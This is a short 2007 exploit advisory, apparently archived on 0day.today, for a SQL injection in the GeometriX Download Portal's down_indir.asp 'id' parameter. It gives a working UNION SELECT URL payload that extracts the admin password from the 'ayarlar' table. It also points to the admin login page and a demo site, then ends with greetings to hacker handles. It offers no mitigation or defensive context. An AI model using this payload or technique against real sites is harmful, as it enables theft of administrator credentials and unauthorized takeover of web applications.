id: 1941
date: 06/08/2007
title: GeometriX Download Portal (down_indir.asp id) SQL Injection Vuln
author: CyberGhost
cves: 

================================================================
GeometriX Download Portal (down_indir.asp id) SQL Injection Vuln
================================================================



#Title: GeometriX Download Portal Remote SQL Injection Vulnerability
#Author: CyberGhost
#Demo Page: http://fullaspsite.somee.com/

#Vuln.

#Password:/down_indir.asp?id=-1+union+select+0,1,adminsifre,3,4,5,6,7+from+ayarlar
#Admin Login : /yonetim.asp
====================================
Thanx : redLine - Hackinger - excellance - Liarhack - KinSize - gsy - kerem125 - BolivaR - Joker - TaRuZ - BuTCHeR - Hacking

And All TURKISH HACKERS !



#  0day.today [2023-03-24]  #